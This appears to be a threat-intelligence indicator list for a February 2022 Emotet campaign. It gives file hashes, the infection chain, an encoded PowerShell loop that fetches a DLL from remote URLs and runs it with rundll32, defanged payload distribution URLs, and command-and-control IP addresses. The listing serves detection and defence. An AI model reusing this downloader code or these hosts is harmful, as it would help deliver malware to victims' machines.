e4_emotet_05.02.2022.txt

Emotet 2022 - 05.02.2022 - epoch4

************************************************************************************************************

.xls e416527878ff98c75748d6ace717bd4d264ea4a44814738cebb93649f4e3509e

.dll 083f77fdf8759be690fd610e5149ca4742f05664dfeccf5a1bdc27b287f22f4d

Exec:

wscript c:\programdata\tghklsd.vbs

C:\Windows\system32\cmd.exe /c ""C:\programdata\jledshf.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell  -enc $jeolise3rhgdzs4cdfg = "hxxps://store.uxdsummit.com/wp-admin/VfgBSQa7Z/", "hxxps://glowrentals.com/wp-admin/f1zeAKGTnS6I/", "hxxp://candisee.bminteractivegroup.com/1g94ngo/2n7lJoPuPDEanPcX/", "hxxp://bachilleratoporciclos.org/wp-content/zR/", "hxxp://formula8020.com/css/JCuR6OE404DgR/", "hxxp://lucasandbarbiehodges.net/wp-content/nbKbVJ8E55V2I/", "hxxps://www.monet.kiev.ua/css/KvkD194/", "hxxp://royalsnackmyanmar.com/wp-includes/Z4E3Vtp8k4Z/", "hxxps://theclubgym.in/wp-includes/jnTMKV3pHa9a/", "hxxps://ssf2.edelta.in/Themes/7hGzIAH5BYf9fFLK/", "hxxps://subs.video/netreginstall/7LKhp4JjAyQ0mc/", "hxxp://homedekornaturalcraft.com/ymu/fGsFT7j/", "hxxp://gosporthistoryclub.org.uk/wp-content/vOixo/", "hxxp://stimulusbrand.com/5qAhX5nC-content/1/", "hxxps://readyplans.in/wp-content/UtiS4IPBYSIiaPzCCe/", "hxxp://pgegroups.com/ism.pgegroups.com/HTv8/", "hxxp://asaanweb.com/PHPMailer-master/1MYGpHszzRfHAN4/"
foreach ($jdtfjdxhr6txyhd in $jeolise3rhgdzs4cdfg) {
  $rhykajdhfs7idfgd = "c:\\programdata\\vbkwk.dll"
  invoke-webrequest -uri $jdtfjdxhr6txyhd -outfile $rhykajdhfs7idfgd
  if (test-path "c:\\programdata\\vbkwk.dll") {
    if ((get-item "c:\\programdata\\vbkwk.dll").length -ge 45000) {
      break
    }
  }
}


C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd

c:\windows\syswow64\rundll32.exe  c:\programdata\vbkwk.dll,dfsgeresd

C:\Windows\SysWOW64\rundll32.exe "c:\programdata\vbkwk.dll",DllRegisterServer

C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ilehkzuov\nmranjdsk.agb",MsvUwZngE

C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Ilehkzuov\nmranjdsk.agb",DllRegisterServer


.dll distro

hxxps://store.uxdsummit.com/wp-admin/VfgBSQa7Z/
hxxps://glowrentals.com/wp-admin/f1zeAKGTnS6I/
hxxp://candisee.bminteractivegroup.com/1g94ngo/2n7lJoPuPDEanPcX/
hxxp://bachilleratoporciclos.org/wp-content/zR/
hxxp://formula8020.com/css/JCuR6OE404DgR/
hxxp://lucasandbarbiehodges.net/wp-content/nbKbVJ8E55V2I/
hxxps://www.monet.kiev.ua/css/KvkD194/
hxxp://royalsnackmyanmar.com/wp-includes/Z4E3Vtp8k4Z/
hxxps://theclubgym.in/wp-includes/jnTMKV3pHa9a/
hxxps://ssf2.edelta.in/Themes/7hGzIAH5BYf9fFLK/
hxxps://subs.video/netreginstall/7LKhp4JjAyQ0mc/
hxxp://homedekornaturalcraft.com/ymu/fGsFT7j/
hxxp://gosporthistoryclub.org.uk/wp-content/vOixo/
hxxp://stimulusbrand.com/5qAhX5nC-content/1/
hxxps://readyplans.in/wp-content/UtiS4IPBYSIiaPzCCe/
hxxp://pgegroups.com/ism.pgegroups.com/HTv8/
hxxp://asaanweb.com/PHPMailer-master/1MYGpHszzRfHAN4/


c2's

45.79.173.200:443
144.76.186.55:7080
207.38.84.195:8080
82.165.152.127:8080
45.118.115.99:8080
50.116.54.215:443
203.114.109.124:443
178.128.83.165:80
107.182.225.142:8080
192.95.56.148:8080
185.157.82.211:8080
212.237.5.209:443
212.24.98.99:8080
162.214.50.39:7080
162.243.175.63:443
176.104.106.96:8080
217.182.143.207:443
144.76.186.49:8080
58.227.42.236:80
110.232.117.186:8080
129.232.188.93:443
45.142.114.231:8080
46.55.222.11:443
103.75.201.2:443
131.100.24.231:80
200.17.134.35:7080
45.118.135.203:7080
173.212.193.249:8080
159.89.230.105:443
160.16.102.168:80
51.254.140.238:7080
119.235.255.201:8080
159.8.59.82:8080
41.76.108.46:8080
212.237.56.116:7080
216.158.226.206:443
178.79.147.66:8080
158.69.222.101:443
138.185.72.26:8080
195.154.133.20:443
164.68.99.3:8080
212.237.17.99:8080
81.0.236.90:443
79.172.212.216:8080
103.75.201.4:443
45.176.232.124:443
104.251.214.46:8080